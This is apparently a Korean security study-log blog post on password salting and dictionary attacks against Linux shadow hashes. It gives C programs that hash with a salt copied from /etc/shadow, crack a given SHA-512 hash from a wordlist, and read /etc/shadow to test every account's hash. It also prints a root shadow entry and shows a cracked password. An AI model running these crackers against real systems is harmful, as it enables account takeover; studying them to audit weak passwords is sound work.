정보보안/공부 기록

Salt, 패스워드 취약점 점검

고고잉 2023. 1. 1. 19:13

Salt

[root@a23-0-0-100 ~]# vim pass.c 안에 아래 내용 작성
#include <stdio.h>
#include <crypt.h>

int main() {
        char pPass[] = "P@ss0rd";
        char pHash[] ="&6$/V7l.Wm/MKUUCzGK"; <- shadow 파일에 salt값 넣기
        char *pResult;

        pResult = crypt(pPass, pHash);
        printf("%s\n", pResult);
        return 0;
}

> 여기서 salt값 복사해가면 된다.
[root@a23-0-0-100 ~]# head -1 /etc/shadow
root:$6$/V7l.Wm/MKUUCzGK$1LGfa1b3PjEuuUYrUgYELDll9uk1Nm0A201DB8aaqoGRp9PCOnOvaZpYQ1pkgxNd3uL6TKm8C3dY7r./l56OC.:19157:0:99999:7:::

> gcc 실행
[root@a23-0-0-100 ~]# gcc -o pass pass.c -lcrypt
[root@a23-0-0-100 ~]#




패스워드 취약점 점검

[root@a23-0-0-100 ~]# vim attack.c (이름은 임의로 정함)
안에 아래 내용 작성

#include <stdio.h>
#include <string.h>
#include <crypt.h>

int main() {
        char key[] = "$6$qEqddkyv$Fj/N7r8D7BfTcmhdwKnISZ27QGjVVJUUIKNNUizz4AXAshVeLqE.0SiXlXwodAHstAwU9jc7NGLrszPNxBk1I1" ; (우리가 알아내고자 하는 hash값 작성)
        char hash[] = "$6$qEqddkyv"; (알고리즘 종류랑 salt 작성)
        char word[20] = "\0";
        char *result;
        FILE * fp = fopen("dict.txt","r");
        while(fscanf(fp,"%s",word)!= EOF){
                result = crypt(word,hash);
                if(strcmp(result, key)==0){
                        printf("key is: %s\n", word);
                        break;
                }
        }
        fclose(fp);
        return 0;
}


[root@a23-0-0-100 ~]# gcc -o crack attack.c -lcrypt

[root@a23-0-0-100 ~]# vim dict.txt
안에 여러 패스워드 작성

1234
P@ssw0rd
qwer1234
q1234
asdf

> 실행하면 해당 아이디에 맞는 패스워드가 파일안에 있을 때 뜬다.
[root@a23-0-0-100 ~]# ./crack
key is: P@ssw0rd
[root@a23-0-0-100 ~]# 







[root@a23-0-0-100 ~]# vim attack2.c 안에 아래 내용 작성

#include <stdio.h>
#include <string.h>
#include <crypt.h>

#define BUF_SIZE 512

int main() {
        FILE *fpShadow = NULL, *fpWordlist = NULL;
        char pShadow[BUF_SIZE], pPass[BUF_SIZE], pWord[BUF_SIZE];
        char *p, *pResult, *pHash;

        fpShadow = fopen("/etc/shadow", "r");
        if(fpShadow == NULL) { return -1; }

        while(fgets(pShadow, BUF_SIZE, fpShadow) != NULL){
                if(!strchr (pShadow, '$')){
                        continue;
                }
                p = strtok(pShadow, ":");
                p = strtok(NULL, ":");
                strcpy(pPass, p);

                fpWordlist = fopen("password.txt", "r");
                if(fpWordlist == NULL){ return-1; }
                while(fgets(pWord, BUF_SIZE, fpWordlist) != NULL ) {
                        p = strtok(pWord, "\n");
                        pResult = crypt(p, pPass);
                        if(!strcmp(pPass, pResult)) {
                                printf("%s:%s\n", pShadow, pPass);
                                printf("Password is %s\n", p);
                                }
                        }
                        fclose(fpWordlist);
                }

                fclose(fpShadow);
                return 0;
}


[root@a23-0-0-100 ~]# gcc -o attack2 attack2.c -lcrypt

[root@a23-0-0-100 ~]# ./attack2